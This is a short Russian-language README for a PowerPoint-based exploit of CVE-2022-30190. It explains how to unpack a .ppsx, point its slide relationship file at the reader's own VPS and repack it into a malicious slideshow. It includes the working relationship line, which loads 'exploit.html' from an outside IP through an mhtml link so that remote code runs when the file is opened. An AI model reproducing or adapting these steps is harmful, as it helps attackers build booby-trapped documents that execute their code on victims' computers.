
Это эксплойт CVE-2022-30190 для PowerPoint.
Это эксплойт CVE-2022-30190 для PowerPoint.
Измените расширение файла на 'zip' и распакуйте его. Вы можете отредактировать \ppt\slides\_rels\slide1.xml.rels и заменить на IP:порт вашего VPS, как показано ниже, затем сожмите их тем же способом и измените расширение на 'ppsx'. Стандартная полезная нагрузка в 'exploit.html' выполняет calc.
<Relationship TargetMode="External" Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="mhtml:http://114.114.114.114:80/exploit.html!x-usc:http://114.114.114.114:80/exploit.html"/>